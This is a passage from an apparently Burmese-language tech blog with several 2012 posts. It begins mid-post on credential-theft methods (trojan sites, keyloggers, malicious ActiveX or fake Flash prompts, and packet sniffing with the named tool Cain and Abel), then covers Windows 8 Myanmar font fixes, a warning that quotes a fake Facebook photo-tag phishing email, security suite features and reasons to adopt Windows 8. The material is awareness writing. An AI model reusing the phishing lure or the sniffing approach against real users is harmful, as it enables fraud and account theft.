ဥပမာ- အေပၚက topic ပိုင္ရွင္ ေပးထားတဲ့ website လိုေတြမွာ Trojans ေတြထည့္သြင္းထားလို႔ရပါတယ္.. အခုပဲၾကည့္ေလ.. ဖြင့္လိုက္ရင္ :
HEUR:Trojan.Script.Iframer ဆိုၿပီးေတာ့ ေပၚပါတယ္.. ဒါမ်ိဳးေတြကိုေတာ့ ေရွာင္ပါ။ မေရွာင္ နိုင္က လုပ္ပါ။ :D

4.key loggers a keystroke logger, key logger ဆိုတာ Hardware Device နဲ႔ Software program ဆိုၿပီးရွိတယ္။ System Unit နဲ႔ Keyboard ၾကားျဖစ္ေစ keyboard နဲ႔တြဲ၍ ျဖစ္ေစ ေသးငယ္တဲ့ battery ပါ၀င္တဲ့ keylogger device ကို၀ွက္ထားနိုင္တယ္.. software အေျခခံတဲ့ keylogger ကေတာ့ ဒီလို Physical ပိုင္းဆိုင္ရာ အလုပ္ပိုစရာမလိုဘူး။
image

5.spywares or u can say tht malicious activeX... or scripts. ဒါကလည္း ဟိုအေပၚက hamster, cookielogger ေတြနဲ႔ မကြာပါဘူးအကုန္တူပါတယ္.. မတူတာက based software ေလးပါ။ Attacker ရဲ့ site ကို၀င္လိုက္တဲ့အခ်ိန္မွာ အလိုအေလ်ာက္ေသာ္လည္းေကာင္း။ ဒါမွမဟုတ္ pop up ကေလးတစ္ခုျပၿပီးေတာ့ ဒီ site, ဒီ file ကို အသုံးျပဳခ်င္တယ္ဆိုရင္ pop up , active x ကို allow လုပ္ပါ ဘာညာေပါ့..
2008 အကုန္ပိုင္းေလာက္ကလဲ Adobe ရဲ့ Flash Player ကိုအေျခခံၿပီးေတာ့ Spyware and Trojans ေတြ ေပၚလာခဲ့ဖူးပါတယ္... ဆိုလိုတာက
website တစ္ခုကို၀င္လိုက္တဲ့ အခ်ိန္မွာ site ရဲ့ အေပၚဆုံးနားမွာ မင္းက ဒီ site ကို သုံးခ်င္တယ္ဆိုရင္ adobe flash player ကို install လုပ္ရမယ္ဆိုၿပီးေတာ့ ေမးပါတယ္.. sex video site ေတြဆိုရင္ ပိုေပါပါတယ္...

6.packet catching တူပါတယ္ဆိုမွ ေနာက္တစ္ခု ဆင္တူရိုးမွားေလးပါ။ ဒါေပမဲ့ဒါက Wired အေပၚမွာ အေျခခံၿပီးေတာ့ အသုံးျပဳတဲ့နည္းပါ။ Cain and Abel (Cane and Cable မဟုတ္ပါ) ကိုနမူနာၾကည့္လို႔ရပါတယ္.. www.oxid.it/cain.html
image



Tuesday, September 25, 2012

windows 8 မွာ ျမန္မာေဖာင့္ အဆင္မေျပ ျဖစ္ေနေသာသူမ်ားအတြက္



ကၽြန္ေတာ့္တို့ အခုေနာက္ပိုင္း Windows 8 Preview Version ထြက္လာျပီးေနာက္ပိုင္း အမ်ားစုက Windows 8 ကို စမ္းျပီး အသံုးျပဳလာတာ ေတြ႕ရပါတယ္...။

ဒီေနရာေလးမွာ ဘာေတြျပႆနာၾကံဳ ေနရလဲဆိုေတာ့ အခုအသစ္ ထြက္လာတဲ့ Windows 8 မွာ Myanmar Text ဆိုျပီးေတာ့ Unicode ကို Support လုပ္ေပးထားပါတယ္...။

အဲ့ဒီအတြက္ ကၽြန္ေတာ္တို့အေနနဲ႕ Unicode ကိုပဲ အသံုးျပဳေနတယ္ဆိုရင္ေတာ့ ျပႆနာမရွိပါဘူး... ဒါေပမယ့္ အမ်ားစုက ေဇာ္ဂ်ီဝမ္းကိုသာ အသံုးျပဳေနတဲ့အခ်ိန္မွာ Folder Rename ကို Zawgyi-one နဲ့ေပးထားလုိ့ Windows 8 မွာေဖာင့္ေတြ ေျပာင္းျပန္ေတြေပၚေနတာေတြ G-talk ေျပာတဲ့အခါ ျပန္မာလုိ့ ေပၚေပမယ့္ ေဖာင့္ေတြက တစ္လြဲေတြျဖစ္ေနတာကို ကၽြန္ေတာ့္ Keymagic သံုးျပီး ေျဖရွင္းလုိ့ ရမယ့္ နည္းလမ္းေလးကို ေရးေပးသြားပါမယ္...။

ကၽြန္ေတာ္တို့ Keymagic ကို သံုးေနတဲ့ သူေတြအတြက္က ျပႆနာမရွိေပမယ့္ မသံုးဖူးေသးတဲ့ သူေတြအတြက္ နည္းနည္း အခက္ခဲ ရွိႏိုင္တာမို့လုိ့ ကၽြန္ေတာ္ Keymagic အသံုးျပဳနည္းေလးကိုပါ ေရးေပးပါ့မယ္...ဘာမွေတာ့ မခက္ပါဘူး...အရင္ဆံုး Windows 8 မွာ Keymagic အလုပ္လုပ္ပို့အတြက္ Microsoft Visual C++2008 Redistributable Package ကို အရင္ Install လုပ္ေပးပို့ လိုအပ္ပါတယ္...။
32 Bits Users ေတြကေတာ့ ဒီေအာက္က လင့္ခ္ေလးမွာ ေဒါင္းေလာ့လုပ္လုိက္ပါ....။
!! ေဆာ႔ပ္၀ဲလ္ေဒါင္းရန္ႏွိပ္ပါ !!
64 Bits Users ေတြကေတာ့ ဒီေအာက္က လင့္ခ္ေလးမွာ ေဒါင္းေလာ့ လုပ္လုိက္ပါ...။
!! ေဆာ႔ပ္၀ဲလ္ေဒါင္းရန္ႏွိပ္ပါ !!
Keymagic ကိုေတာ့ ဒီေအာက္ကလင့္ခ္မွာ ေဒါင္းေလာ့ ယူလိုက္ပါ...။
!! ေဆာ႔ပ္၀ဲလ္ေဒါင္းရန္ႏွိပ္ပါ !!
အားလံုးကို ေဒါင္းေလာ့ လုပ္ျပီးရင္ Microsoft က ေဒါင္းေလာ့လုပ္ထားတဲ့ Package ေလးကို အရင္ Install လုပ္လုိက္ပါ...ျပီးမွ Keymagic ကို Install လုပ္ေပးလိုက္ပါ...ဒါဆိုရင္အဆင္ေျပသြား ပါလိမ့္မယ္...ကၽြန္ေတာ္ တစ္ခ်က္ေျပာပို့ က်န္ခဲ့တာက Zawgyi-One ေဖာင့္ကိုု install လုပ္မယ္ဆိုရင္လည္း အရင္ Windows 7 မွာတုန္းက အတိုင္းပါပဲ ဘာမွ မထူးပါဘူး...Install လုပ္ေပးလုိက္ပါ..

ဒါဆိုရင္ ကၽြန္ေတာ့္တုိ့ Computer မွာ Myanmar Text Zawgyi-One ႏွစ္မ်ဳိးစလံုး အသံုးျပဳလုိ့ ရသြားပါျပိး...Keymagic ကို အသံုးျပဳရတာလြယ္ပါတယ္...ကၽြန္ေတာ္တုိ့ Zawgyi-One ကို အသံုးျပဳမယ္ဆိုရင္ အရင္ Windows 7 က အတိုင္း အသံုးျပဳရံုပါပဲ...Keymagic နဲ့ Unicode Font ကို ေျပာင္းသံုးခ်င္ရင္ေတာ့ Keyboard မွ Shift +Ctrl +Z ကုိႏွိပ္လိုက္ပါ...ဒါဆိုရင္ ကၽြန္ေတာ္တို့က keydoard မွ Zawgyi-One လက္ကြက္နဲ႕ ရိုက္ေနေပမယ့္လည္း စာလံုးေတြက Unicode ေဖာင့္နဲ႕ သူ့အလိုလုိေျပာင္းသြားပါလိမ့္မယ္...Convert လုပ္ေပးတာပါ...ဒါဆုိရင္ေတာ့ လက္ကြက္အတြက္ အဆင္ေျပသြား ျပီးလုိ့ ထင္ပါတယ္ဗ်....။

ကၽြန္ေတာ္တုိ့ Folder ေတြမွာ ျမန္မာလုိ Zawgyi-One ေဖာင့္နဲ႕ မေပၚေတာ့တာေတြအတြက္ အရင္ Windows 7 တုန္းကလို Font ကို သြားခ်ိန္းေပးလုိ့မရပါဘူး...အဲ့ဒီအတြက္ ကၽြန္ေတာ္တို့ လုပ္ရမွာတစ္ခုက Zawgyi-One ေဖာင့္နဲ႕ Rename ေပးထားတာေတြကို Keymagic သံုးျပီး Myanmar Text နဲ႕ျပန္ျပီး Rename ေပးမွသာ Folder ေတြမွာ ျမန္မာေဖာင့္ ေပၚေတာ့မွာ ျဖစ္ပါတယ္...

ေနာက္တစ္ခ်က္ကေတာ့ G-Talk သံုးတဲ့အခါမွာ ျမန္မာလိုေပၚေသာ္လည္း Font ေတြက ထံုးစံအတိုင္း တလြဲေတြေပၚေနပါလိမ့္မယ္...အဲ့ဒီအတြက္ ကၽြန္ေတာ္တို့က Gtalk က Setting ထဲမွာ Zawgyi-One ေဖာင့္ကို သြားျပီး ေျပာင္းေပးလိုက္ရင္ အဆင္ေျပသြားပါလိမ့္မယ္

Monday, September 10, 2012

Facebook သံုးသူမ်ား သတိျပဳရန္



Sophos' Naked Security ကုမၸဏီ၏ သတိေပးခ်က္အရ Facebook မွ ေပးပုိ႕ေသာ အီးေမးလ္အတုအေယာင္ ဖန္တီးေပးပုိ႕မႈမ်ား ႐ွိေနေၾကာင္း သိရသည္။ မိမိ၏ Facebook သူငယ္ခ်င္းတစ္ဦးဦးက မိမိပါဝင္ေသာ ဓာတ္ပုံသစ္တစ္ပုံကုိ အယ္လ္ဘမ္တြင္ ထည့္သြင္းလုိက္ေၾကာင္း ေရးသားထားၿပီး အဆုိပါဓာတ္ပုံအား ၾကည့္႐ႈရန္ "View photo with you in the attachment" ဟူသည့္ tab တစ္ခုပါ႐ွိမည္ ျဖစ္သည္။ 

သုိ႕ေသာ္ အဆုိပါ attachment တြင္ အမွန္တစ္ကယ္အားျဖင့္ ကြန္ပ်ဴတာစနစ္အား တုိက္ခိုက္ႏိုင္သည့္ Trojan Horse ဗုိင္းရပ္စ္အမ်ဳိးအစား ပါဝင္လာၿပီး မိမိ၏ ကြန္ပ်ဴတာသို႕ ကူးစက္ဝင္ေရာက္သြားႏုိင္ေၾကာင္း Naked Security က သတိေပးထားသည္။ 


Facebook မွ ေပးပုိ႕ေသာ အီးေမးလ္အတုအေယာင္ပုံစံတြင္ ေအာက္ေဖာ္ျပပါစာသားမ်ား ပါဝင္ၿပီး ပုံတြင္ေဖာ္ျပထားပါသည္။
 

Greetings,
One of Your Friends added a new photo with you to the album.
You are receiving this email because you’ve been listed as a close friend.
[View photo with you in the attachment]

Friday, August 24, 2012

Security Suite တစ္ခုတြင္ ရွိသင့္ေသာ အဂၤါမ်ား



လုပ္ငန္း လုပ္ေဆာင္မႈ အတြက္ေသာ္လည္းေကာင္း၊ ပညာသင္ၾကားမႈ အတြက္ေသာ္လည္းေကာင္း ကြန္ပ်ဴတာကို မျဖစ္မေနသုံးရမည့္ ေခတ္ႀကီးထဲတြင္ data လုံၿခံဳမႈအတြက္ ျဖစ္ေစ၊ ကိုယ္ေရး လုံၿခံဳမႈအတြက္ျဖစ္ေစ အေလးထား ေဆာင္ရြက္ရပါလိမ့္မယ္။ ထုိသို႔ေသာ လုံၿခံဳမႈကို ေပးစြမ္းႏုိင္သည့္ ေဆာ့ဖ္ဝဲမ်ားမွာ security suite မ်ားပင္ ျဖစ္ပါသည္။ Security Suite တစ္ခုသည္ Antivirus ေဆာ့ဖ္ဝဲတစ္ခု လုပ္ေဆာင္ႏုိင္စြမ္းႏွင့္ Internet Security ေဆာ့ဖ္ဝဲတစ္ခုတုိ႔၏ လုပ္ေဆာင္ႏုိင္စြမ္းမ်ားအားလုံးပါဝင္သည့္အျပင္ အျခားေသာ လိုအပ္ႏုိင္ဖြယ္ ကိစၥမ်ားအတြက္ ေဆာင္ရြက္ခ်က္မ်ားလည္း ပါဝင္ပါသည္။

ဤေဆာဖ့္ဝဲသည္ အခေၾကးေငြ အထိုက္အေလ်ာက္ ျမင့္မားစြာေပး၍ ဝယ္ယူသုံးစြဲရေသာ ေဆာ့ဖ္ဝဲျဖစ္ပါသည္။ ထုိ႔ေၾကာင့္ ေပးရေသာ အခေၾကးေငြႏွင့္ ထုိက္တန္စြာ လုပ္ေဆာင္ေပးႏုိင္ျခင္း ရွိမရွိကို ေအာက္ပါအခ်က္မ်ားႏွင့္ ခ်ိန္ထုိးစစ္ေဆးသင့္ပါသည္။


Signature Detection အားေကာင္းျခင္း

ကြန္ပ်ဴတာေခတ္ဦးတြင္ ေပၚေပါက္ခဲ့ေသာ Security ေဆာ့ဖ္ဝဲတုိ႔သည္ Malware မ်ားကို စစ္ေဆးရာ၌ Virus signature ကိုသာ အေျချပဳ၍ အစမွအဆုံးတုိင္ အလုပ္လုပ္ခဲ့ၾကပါသည္။ Signature ဆုိသည္မွာ Malware (Virus အပါအဝင္) တစ္ခုပါဟု ဆုံးျဖတ္ႏုိင္ေစေသာ စ႐ိုက္လကၡဏာပင္ ျဖစ္ပါသည္။ အသစ္ေတြ႕ရွိလာရေသာ application တစ္ခု သို႔မဟုတ္ ဖုိင္တစ္ခုသည္ Malware ဟုတ္မဟုတ္ ဆုံးျဖတ္ရာ၌ ႀကိဳတင္စုေဆာင္းထားေသာ Signature database ထဲမွ အခ်က္အလက္မ်ားႏွင့္ တုိက္ဆုိင္ စစ္ေဆးရပါသည္။ ဤနည္းလမ္းျဖင့္သာ Malware အေဟာင္းမ်ားကိုေရာ၊ ပုံစံေျပာင္းလာသည့္ Malware မ်ားကိုေရာ မွတ္မိသိရွိေစၿပီး လုံၿခံဳေရးပါရဂူမ်ားက ဆန္းစစ္မႈ ျပဳႏုိင္ပါလိမ့္မည္။

ဟက္ကာလူဆုိးတုိ႔က Malware မ်ားကို နည္းလမ္းေပါင္းစုံျဖင့္ ေန႔စဥ္ႏွင့္အမွ် ျပဳလုပ္ၿပီး အင္တာနက္ေပၚ တင္ေပးေနပါသည္။ ထုိ႔ေၾကာင့္ ကြန္ပ်ဴတာသုံးစြဲသူတုိ႔ကလည္း လုံၿခံဳေရးပညာရွင္မ်ား အသစ္ထပ္ျဖည့္ေသာ Malware တုိ႔၏ စ႐ိုက္လကၡဏာ စာရင္းႀကီးကို အျမဲတေစ update လုပ္ေနရပါသည္။ ထိုစာရင္းကို ေန႔စဥ္သာမဟုတ္ နာရီပိုင္းအလိုက္ပင္ ထပ္မံ ျဖည့္စြက္ေနရပါသည္။ Security Update မ်ားေပးရာ၌ ေဆာ့ဖ္ဝဲထုတ္လုပ္ေသာ ကုမၸဏီတစ္ခုႏွင့္တစ္ခု အခ်ိန္ကာလ သတ္မွတ္ပုံမ်ား မတူပါ။ ႀကိဳးစားအားထုတ္မႈ အေကာင္းဆုံးကုမၸဏီမ်ားက တစ္နာရီလွ်င္ တစ္ႀကိမ္ update ထုတ္ေပးပါသည္။ အခ်ဳိ႕ကုမၸဏီမ်ားက ၄ နာရီမွ ၆ နာရီျခား တစ္ႀကိမ္ထုတ္ေပးၿပီး ကုမၸဏီအမ်ားစုမွာ တစ္ရက္လွ်င္ တစ္ႀကိမ္သာ update ထုတ္ေပးပါသည္။

Zero day threat ဟုေခၚေသာ Malware ၏ ၿခိမ္းေျခာက္မႈအႏၲရာယ္ ေပၚလာသည့္အခါ Signature ကို အေျခခံၿပီး အလုပ္လုပ္သည့္ Antivirus မ်ားႏွင့္ Spyware တုိ႔သည္ လုံးဝ အသုံးမက်ေတာ့သလို ေဘးဖယ္စဥ္းစားျခင္း ခံလာၾကရပါသည္။ အဆုိပါ Malware သည္ ယင္းအား ေဖာ္ထုတ္ေတြ႕ရွိသည့္ ေန႔၌ပင္ အႏၲရာယ္ျပဳေနၿပီ ျဖစ္ပါသည္။ ယေန႔ အခ်ိန္တြင္ Malware ဖန္တီးသည့္ အလုပ္သည္ ပ႐ိုဂရမ္ဘာသာစကားတစ္ခု ကၽြမ္းကၽြမ္းက်င္က်င္တတ္သည့္ ပုဂၢဳိလ္ကခ်ည္း ျပဳလုပ္သည့္ အလုပ္မဟုတ္ေတာ့ပါ။ Malware ဖန္တီးသည့္ လုပ္ငန္းစဥ္ကို ေရာင္းကုန္သဖြယ္ အခေၾကးေငြျဖင့္ အင္တာနက္ေပၚတြင္ ျပဳလုပ္လာၾကပါသည္။

Zeus ဟူေသာ ေဆာဖ့္ဝဲမွာ ပ႐ိုဂရမ္ဘာသာစကား မကၽြမ္းက်င္သူတုိ႔အား Malware ပညာရွင္အျဖစ္သို႔ ပို႔ေပးမည့္ ေဆာ့ဖ္ဝဲမ်ားထဲမွ နမူနာတစ္ခု ျဖစ္ပါသည္။ ထုိ႔ေၾကာင့္ ႏုိင္ငံတကာသုံး ေငြေၾကးတစ္စုံတစ္ရာရွိေသာ ပုဂၢိဳလ္တစ္ေယာက္သည္ Malware လုပ္နည္းလုပ္ဟန္ကို ဝယ္ယူၿပီး ဟက္ကာတစ္ေယာက္ အလြယ္တကူ ျဖစ္လာႏုိင္ပါသည္။ ကြန္ပ်ဴတာကို ပီပီျပင္ျပင္ သုံးတတ္႐ုံမွ်ျဖင့္ ဟက္ကာျဖစ္လာႏိုင္သည့္ အေျခအေနမ်ဳိး ရွိပါသည္။ ထုိသို႔ေသာ ဟက္ကာမ်ားလည္း တစ္ေန႔တျခား မ်ားျပားလာသလို ထုိသူတုိ႔ ဖန္တီးေသာ Malware မ်ားကလည္း တစ္ေန႔တျခား မ်ားျပားလာသည္ျဖစ္ရာ လုံၿခံဳေရးပညာရွင္တုိ႔က Malware analysis ကို အလ်ဥ္မီေအာင္လုပ္ဖို႔ မလြယ္ေတာ့ပါ။

သို႔ေသာ္လည္း Signature ကို အေျခမခံဘဲ အလုပ္လုပ္ႏုိင္ေသာ Antivirus ေဆာ့ဖ္ဝဲမ်ား ေပၚေပါက္လာေရးမွာ မ်ားစြာ အလွမ္းေဝးေနပါေသးသည္။ Windows OS သုံးေသာ နယ္ပယ္တစ္ခုထဲ၌ပင္ Malware သန္းခ်ီ၍ ရွိေနပါသည္။ သို႔ေသာ္ Malware တိုင္းသည္ လုံးလုံးလ်ားလ်ား အသစ္မဟုတ္ဘဲ အခ်ဳိ႕မွာ နဂိုရ္ရွိရင္း Malware ကိုပင္ အနည္းငယ္မွ် အသြင္ေျပာင္းထားျခင္း ျဖစ္ပါသည္။ ထုိ႔ေၾကာင့္ အခ်ိန္ႏွင့္ တစ္ေျပးညီ ထုိက္သင့္အားေလ်ာ္စြာ ျဖည့္စြက္ေပးေနေသာ Signature database တစ္ခု လက္ဝယ္ရွိထားလွ်င္ မိမိ PC ကို အတုိင္းအတာတစ္ခုထိ ကာကြယ္ထားႏုိင္ပါမည္။

Malware အမ်ားစုကိုလည္း စက္တြင္းမွ ဆြဲထုတ္ပစ္ႏုိင္ပါလိမ့္မည္။ အခ်ိန္ယူၿပီး အပင္ပန္းခံလုပ္ရမည့္ လုံၿခံဳေရးဆုိင္ရာ လုပ္ငန္းစဥ္မ်ား ျပဳလုပ္ႏုိင္သည့္ အခ်ိန္အထိေစာင့္ေနပါက ထိခိုက္နစ္နာမႈ ႀကီးမားႏုိင္ပါသည္။ ယေန႔ ျမန္မာႏုိင္ငံတြင္ရရွိေနေသာ အသင့္အတင့္ အင္တာနက္ အျမန္ႏႈန္းကို သုံး၍ Signature update ကို ေန႔စဥ္လုပ္ကိုင္မည္ဆုိပါက (အင္တာနက္ ေန႔စဥ္သုံးရသူဆုိလွ်င္ Auto update ျဖစ္ေအာင္ ခ်ိန္ညႇိေပးထားႏုိင္ပါသည္။) မိနစ္ ၂၀ ထက္မပိုေသာ ကာလအတြင္း လုပ္ငန္းၿပီးစီးႏုိင္ပါသည္။ Update file download ဆြဲလွ်င္ တစ္နာရီနီးပါး ၾကာႏုိင္ပါသည္။ Security suite ဝယ္ရာ၌ ယင္းေဆာ့ဖ္ဝဲထုတ္လုပ္ေသာ ကုမၸဏီသည္ မည္မွ် တုိေတာင္းေသာ အခ်ိန္တြင္း update တစ္ႀကိမ္စီ ထုတ္ေပးႏုိင္သည္ကို အေလးထားစဥ္းစားရပါမည္။


Behaviour based ႏွင့္ Cloud based detection လုပ္ေပးႏုိင္ျခင္း

မိမိစက္အတြင္းသို႔ ဝင္လာသည့္ application သို႔မဟုတ္ ဖိုင္တစ္ခုသည္ malware ဟုတ္မဟုတ္ signature detection နည္းတစ္ခုတည္းျဖင့္ စစ္ေဆးရန္ မျဖစ္ႏိုင္ဟု ဆုိသည့္အခါ ယင္း၏ ျပဳမူေဆာင္ရြက္ပုံမ်ားကို ေစာင့္ၾကည့္ၿပီး malware ဟုတ္မဟုတ္ ဆုံးျဖတ္ရသည့္ အေျခအေနသို႔ ေရာက္လာပါသည္။ ပညာရပ္အေခၚအားျဖင့္ heuristic scanning ဟူေသာ နည္းမွာ behaviour based scanning ပင္ ျဖစ္ပါသည္။

ဤနည္းျဖင့္ ဝိုင္းဝန္းစစ္ေဆးသည့္တုိင္ malware ဟုတ္မဟုတ္ မဆုံးျဖတ္ႏုိင္ေသးပါက အဆုိပါ မသကၤာဖြယ္ application သို႔မဟုတ္ ဖုိင္အား အင္တာနက္ေပၚတင္ၿပီး cloud based detectionျဖင့္ ထပ္မံစစ္ေဆးပါသည္။ Cloud based ျဖင့္ စစ္ေဆးရာတြင္ Virus Engine တစ္မ်ဳိးတည္း သုံးေတာ့သည္ မဟုတ္ဘဲ Engine 10 မ်ဳိးမွ ၄၀ မ်ဳိးအထိသုံးၿပီး ဝိုင္းဝန္းစစ္ေဆးၾကျခင္း ျဖစ္ပါသည္။ ထုိ႔ေၾကာင့္ ယေန႔ေခတ္ Security suite တစ္ခုတြင္ behavior based ႏွင့္ Cloud based detection စြမ္းရည္ ႏွစ္မ်ဳိးလုံးပါဝင္ေရးသည္ အလြန္အေရးႀကီးေသာ အခ်က္ ျဖစ္လာပါသည္။

Security Suite ေရာင္းသူတုိ႔က ထုိအရည္အေသြးႏွစ္ရပ္ကို နာမည္ဆန္းဆန္းေပးၿပီး ေဆာ့ဖ္ဝဲထဲတြင္ တြဲထည့္ေပးတတ္ၾကပါသည္။ အသစ္ေပၚလာေသာ မ်ဳိးမည္မသိ Virus ကို စစ္ေဆးမႈမ်ားျဖင့္ သိျမင္ႏုိင္သည္လည္း ရွိသလို ကြန္ပ်ဴတာ သုံးစြဲသူက မိမိ အေတြ႕အႀကံဳအေပၚ အေျခခံကာ မည္သုိ႔မည္ပုံ ေဆာင္ရြက္ရမည္ကို ဆုံးျဖတ္ေပးလိုက္ရျခင္းမ်ဳိးလည္း ရွိႏုိင္ပါသည္။ မိမိထည့္သြင္းလုိက္ေသာ ေဆာ့ဖ္ဝဲတစ္ခုအား disable လုပ္ျခင္း uninstall လုပ္ျခင္းတုိ႔အတြက္ access permission (ဥပမာ- Admin) ရွိရန္လိုပါသည္။ တရားဝင္ေဆာ့ဖ္ဝဲေရာ malware ကပါ အဆုိပါ access permissionကို ေတာင္းေလ့ရွိပါသည္။ ထို႔ေၾကာင့္ ဆုံးျဖတ္ရခက္ပါသည္။ Security Suite သည္ တစ္ခါတစ္ရံ မွားယြင္းဆုံးျဖတ္ျခင္း (False positive) မ်ဳိး ရွိႏုိင္ပါသည္။ ထုိ႔ေၾကာင့္ မိမိဘာသာ ေသခ်ာလွ်င္ျဖစ္ေစ (ဥပမာ- Cracked software သုံးျခင္း) ဆည္းပူးေလ့လာမႈအရ သိလွ်င္ျဖစ္ေစ လိုအပ္သလို ၾကားဝင္ ေဆာင္ရြက္ဖုိ႔လိုပါသည္။

အေကာင္းဆုံးေသာ security suite တုိ႔သည္ malware warning ေပးသည့္အခါ သုံးစြဲသူအမ်ားေပးထားသည့္ မွတ္ခ်က္တုိ႔အေပၚ အေျချပဳ၍ စစ္ေဆးဆုံးျဖတ္မႈမ်ဳိး ျပဳေလ့ရွိပါသည္။ သူ႔ဘာသာ ဆုံးျဖတ္ ေဆာင္ရြက္တတ္ေသာ Security ေဆာ့ဖ္ဝဲမ်ဳိးျဖစ္လွ်င္ သံသယရွိေသာ ေဆာ့ဖ္ဝဲအေပၚ ကြန္ပ်ဴတာသုံးစြဲသူ၏ ထင္ျမင္ယူဆမႈအဆင့္ (rating) ေပးေစပါသည္။ ေနာင္ထုတ္လုပ္မည့္ Version မ်ားတြင္ အဆုိပါ သတ္မွတ္ခ်က္တုိ႔ကို အေျချပဳလ်က္ Behavior Engine ကို ျပဳျပင္ယူပါသည္။ ထို႔ေၾကာင့္ မွားယြင္းဆုံးျဖတ္မႈမ်ား နည္းပါးေစသည့္အျပင္ စစ္ေဆးမႈ လုပ္ငန္းစဥ္ကုိလည္း ပိုမိုျမန္ဆန္ေစပါသည္။

Security suite တစ္ခုသည္ သုံးစြဲသူမ်ားေလေလ ပရိသတ္ထဲမွလာေသာ သတင္းအခ်က္ အားေကာင္းေလေလ ျဖစ္ပါသည္။ သို႔ေသာ္ သုံးစြဲသူအမ်ားဆုံး ေဆာ့ဖ္ဝဲမွရလာေသာ သတင္းအခ်က္အလက္တုိင္းသည္ ထည့္သြင္းစဥ္းစားရန္ မထိုက္တန္ပါ။ ထုိ႔ေၾကာင့္ Security ေဆာ့ဖ္ဝဲ ထုတ္လုပ္ေရာင္းခ်သူတုိ႔သည္ တစ္ဦးႏွင့္တစ္ဦး user infromation မ်ားကုိ မွ်ေဝအသုံးျပဳၾကရပါသည္။ Security suite တစ္ခု၏ ထိေရာက္မႈကို ဆုံးျဖတ္ႏုိင္ရန္အတြက္ အခါအားေလ်ာ္စြာ ထုတ္ေဝေသာ နည္းပညာ ေဆာင္းပါးမ်ားကိုလည္း ဖတ္႐ႈသင့္ပါသည္။


Firewall သည္ ႏွစ္လမ္းသြားျဖစ္ျခင္း

Firewall သည္ မည္သည့္ Windows တြင္မဆုိ default ပါဝင္ေနၿပီး default သည္လည္း ျဖစ္ပါသည္။ မရွိသည္ထက္စာလွ်င္ သုံးေပ်ာ္သည့္ firewall လည္းျဖစ္ပါသည္။ မိမိဝယ္ယူသုံးစြဲေသာ security suite တြင္ သက္ဆုိင္ရာ Firewall ပါလာသင့္ပါသည္။ မိမိကြန္ပ်ဴတာအား ထိပါးလာမည့္ အႏၲရာယ္မ်ား စက္အတြင္းသို႔ မေရာက္မီ မည္သည့္ေနရာမွမဆုိ စစ္ထုတ္ ဖယ္ရွားပစ္ႏုိင္ရပါမည္။ Security suite အားလုံးရွိ firewall တုိင္းသည္ စြမ္းရည္တူညီသည္ မဟုတ္ပါ။ အေကာင္းဆုံး Firewall တြင္ အပိုစြမ္းေဆာင္ရည္မ်ားပါလာပါသည္။

မိမိ၏ အင္တာနက္ခ်ိတ္ဆက္မႈကို လည္းေကာင္း၊ မိမိ၏ wifi ကြန္ရက္အတြင္း လူစိမ္းမ်ား ဝင္ေရာက္ခ်ိတ္ဆက္ရန္ ႀကိဳးပမ္းမႈကိုလည္းေကာင္း အဆုိပါ firewall မ်ဳိးက ေစာင့္ၾကည့္ သတိေပးႏုိင္ပါသည္။ ထုိ႔ျပင္ မိမိကြန္ပ်ဴတာထဲမွ data မ်ား အျပင္သို႔ စိမ့္ထြက္ၿပီး ျပင္ပ Malware တစ္ခုခုကို ဆြဲသြင္းရန္ ႀကိဳးစားမႈမ်ားကိုလည္း ရပ္တန္႔ေပးပါလိမ့္မည္။ ယင္းသို႔ အတြင္းရန္ အျပင္ရန္ ႏွစ္ခုလုံးကို ေစာင့္ၾကည့္တားဆီးေပးႏုိင္သည့္ firewall မ်ဳိးကိုသာ အသုံးျပဳသင့္ပါသည္။ မိမိေရြးခ်ယ္ထားေသာ Firewall ကို ပုံမွန္ update လုပ္ရန္လည္း အေသအခ်ာ သတိျပဳရပါမည္။ Firewall အသစ္ကို သုံးလွ်င္ Windows တြင္ default ပါေသာ firewall ကို disable လုပ္ရန္လည္း သတိထားဖုိ႔ လုိပါသည္။

Wednesday, August 15, 2012

Windows 8 ကိုသံုးသင့္ေသာ အေၾကာင္းမ်ား


ေအာက္တိုဘာလကုန္တြင္ Windows 8 ကို အၿပီးသတ္ထုတ္လုပ္မည္ဟု Microsoft ကေၾကညာခဲ့
ၿပီးျဖစ္ရာ Windows 8ထြက္ေပၚလာမည့္ ကာလသည္ မေ၀းေတာ့ၿပီ။ Windows Vista ထြက္လာ ၿပီးသည့္ေနာက္တြင္ ျပႆနာေပါင္းစံုေထြျပားမႈေၾကာင့္ OS အသစ္သံုးသူတို႔သည္ Windows XP သို႔ေနာက္ျပန္ဆုတ္ၿပီး အသံုးျပဳခဲ့ၾကရသည္။

Windows 7 ထြက္ေပၚလာသည့္အခါတြင္လည္း ထိုသံသယက မကုန္စင္ေသး။ ထို႔ေၾကာင့္ ယေန႔အခ်ိန္ထိတုိင္ Windows XP သံုးသူႏွင့္ ၇ သံုးသူအေရအတြက္သည္ အတူနီးပါးရွိေနသည္။

သို႔ေသာ္ Windows 7 က သံုးစြဲရာ၌အဆင္ေျပပါသည္။ အလုပ္လုပ္ရာ၌လည္း ပို၍လွ်င္ျမန္သည္။
ေနာင္ထြက္လာမည့္ Windows 8 က ပို၍ပင္လွ်င္ျမန္လာပါဦးမည္။

Windows 8သည္ Windows 7 လို Vista အစပ္အေျချပဳၿပီး ျပင္ဆင္ထားေသာ OS မဟုတ္ပါ။ အစအဆံုး ဒီဇုိင္းအသစ္ျဖင့္ ေရးဆြဲထားေသာ OS ျဖစ္ပါသည္။

Windows 8 သို႔ ေျပာင္းလဲအသံုးျပဳသင့္သလားဟုေမးလွ်င္ သံုးသင့္သည္ဟုေျဖပါမည္။ Windows 8 သို႔ ေျပာင္းလဲအသံုးျပဳသင့္ေသာ အေၾကာင္းရင္းခံတို႔ကိုၾကည့္လွ်င္ ေအာက္ပါအတုိင္း ေတြ႕ရပါမည္။

Touch screen ကို အေထာက္အပံ့ျပဳေသာ Windows 8
Windows 8၏ အဓိကအေျပာင္းအလဲကိုၾကည့္လွ်င္ user interface ၌ပင္ စ၍ေတြ႕ရပါသည္။

စက္ကိုဖြင့္သည့္အခါ စေတြ႕ရမည့္ Metro interface သည္ဒီဇုိင္းအသစ္ျဖစ္ၿပီး touch ျဖင့္ အလုပ္လုပ္ႏုိင္ ေအာင္ အထူးေရးဆြဲထားပါသည္။

Windows 7 သည္လည္း Touch မ်ားေခတ္မစားေသးသလို Tablet ေပၚတြင္ OS အလုပ္လုပ္ႏုိင္မည့္ အေရးကိုလည္း မစဥ္းစားခဲ့ပါ။

